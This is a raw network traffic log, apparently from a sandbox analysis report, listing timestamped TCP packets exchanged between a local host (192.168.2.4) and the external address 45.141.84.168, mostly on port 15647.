                                          Nov 28, 2024 13:40:36.520123005 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.520183086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.528351068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.528408051 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.534590006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.537169933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.540958881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.541104078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.541172981 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.567143917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.567209959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.580640078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.580734968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.580765009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.581840038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.581892014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.582993984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.593261003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.593316078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.593338966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.598515987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.598639965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.605287075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.605338097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.608254910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.608329058 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.608388901 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.613931894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.615245104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.626111031 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.626177073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.626208067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.640177965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.640237093 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.640310049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.648859978 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.648909092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.653458118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.653517008 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.653573036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.661108971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.661195993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.670941114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.670995951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.671001911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.684221983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.684334040 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.684384108 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.690571070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.692473888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.701953888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.706407070 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.706485987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.706548929 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.718729973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.721113920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.721348047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.721394062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.728359938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.728451967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.736017942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.736094952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.736140013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.747611046 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.747752905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.769417048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.770766020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.776352882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.776482105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.776485920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.776524067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.778642893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.778692961 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.784029007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.784686089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.784709930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.798403025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.799932957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.800010920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.800163984 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.812515020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.815382957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.815495968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.815577984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.815653086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.826447010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.828464031 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.841622114 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.841726065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.841785908 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.849837065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.849901915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.849916935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.862432957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.864535093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.876739025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.876943111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.877022028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.889571905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.890837908 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.892205954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.896625996 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.896684885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.898838043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.898894072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.898971081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.913914919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.914694071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.914762974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.914832115 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.918555975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.920586109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.926733971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.926806927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.926873922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.929642916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.932450056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.936670065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.936719894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.937035084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.940521955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.957293034 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.957920074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.958127975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.958214045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.971705914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.971836090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.972702980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.972836971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.972899914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.987229109 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:36.993474960 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:36.996495008 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.006486893 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.006558895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.011077881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.011169910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.013736010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.016491890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.019006968 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.019071102 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.027581930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.028650045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.034126043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.036703110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.040702105 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.044653893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.049712896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.052695036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.056672096 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.056767941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.069379091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.070653915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.070717096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.084892988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.087096930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.088602066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.091856956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.091931105 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.092281103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.092343092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.106230974 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.106673002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.106760025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.106846094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.107661963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.107721090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.119801998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.119959116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.131172895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.131259918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.136682034 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.136894941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.150466919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.151660919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.152040005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.156663895 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.156748056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.158957958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.159509897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.172707081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.173151016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.188822985 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.191200018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.191266060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.204878092 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.205008030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.208549023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.208604097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.212342024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.212390900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.212445974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.212507010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.218322992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.218385935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.226378918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.226445913 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.227715969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.227777958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.232462883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.232531071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.232562065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.241975069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.242037058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.256839991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.256931067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.257980108 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.258019924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.258035898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.258080959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.270647049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.270725965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.276757002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.276844025 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.281081915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.281147957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.281181097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.288506985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.288741112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.308811903 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.308881044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.308897018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.308938026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.309015989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.309058905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.311321020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.318850994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.318912983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.318928003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.327964067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.328008890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.328022003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.332869053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.332968950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.338804007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.338931084 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.342699051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.342755079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.342761993 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.347928047 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.348014116 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.357979059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.358025074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.358037949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.374051094 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.374116898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.374136925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.390778065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.390891075 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.392854929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.392939091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.401240110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.401304007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.406385899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.406477928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.406503916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.409877062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.409887075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.409981012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.423665047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.427557945 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.427642107 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.427716017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.439656019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.439743996 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.441220999 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.441268921 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.441298962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.453178883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.453298092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.458112955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.458183050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.458219051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.462878942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.462949038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.471942902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.472007990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.472044945 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.477300882 CET90004986045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.477336884 CET90004986045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.477392912 CET498609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.477484941 CET498609000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.486535072 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.494051933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.494128942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.494596004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.494647980 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.494678020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.494735003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.509555101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.509650946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.509730101 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.513030052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.513099909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.526453018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.526531935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.526848078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.526902914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.526906967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.526953936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.530484915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.530555010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.543785095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.543850899 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.549314022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.549324989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.549370050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.562370062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.562458038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.563354969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.563412905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.569948912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.570014954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.570054054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.578073025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.578138113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.579926968 CET498659000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.587584019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.587656975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.587681055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.597647905 CET90004986045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.598352909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.598431110 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.606729984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.606817007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.614584923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.614680052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.624021053 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.624105930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.624139071 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.624197960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.626091003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.626163006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.628588915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.628804922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.633033037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.633183002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.640969038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.641046047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.646940947 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.647012949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.649547100 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.649621010 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.661081076 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.661147118 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.661164999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:37.670798063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:37.670896053 CET4973015647192.168.2.445.141.84.168
